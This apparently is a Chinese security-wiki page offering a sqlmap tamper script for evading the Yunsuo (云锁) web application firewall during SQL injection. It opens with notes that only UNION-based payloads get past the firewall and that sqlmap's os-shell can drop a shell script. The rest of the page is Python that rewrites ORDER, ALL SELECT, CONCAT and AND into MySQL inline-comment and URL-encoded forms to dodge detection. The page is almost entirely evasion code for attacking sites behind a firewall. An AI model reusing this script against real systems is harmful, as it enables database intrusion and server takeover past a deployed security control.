sqlmap bypass 云锁tamper

只支持用union查询来过的,其他的测试语句会被云锁报警,这里问下大佬sqlmap能不能指定union来测试。。 这个os-shell也可以写出shell脚本,但是还后续执行命令会被云锁报警

#!/usr/bin/env python

"""
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import re

from lib.core.data import kb
from lib.core.enums import PRIORITY
from lib.core.common import singleTimeWarnMessage
from lib.core.enums import DBMS
__priority__ = PRIORITY.LOW

def dependencies():
    pass

def tamper(payload, **kwargs):
         payload=payload.replace('ORDER','/*!00000order*/')
         payload=payload.replace('ALL SELECT','/*!00000all*/ /*!00000select')
         payload=payload.replace('CONCAT(',"CONCAT/**/(")
         payload=payload.replace("--"," */--")
         payload=payload.replace("AND","%26%26")
         return payload
零组资料文库 all right reserved,powered by 0-sec.org未经授权禁止转载 2019-11-03 17:45:44

results matching ""

    No results matching ""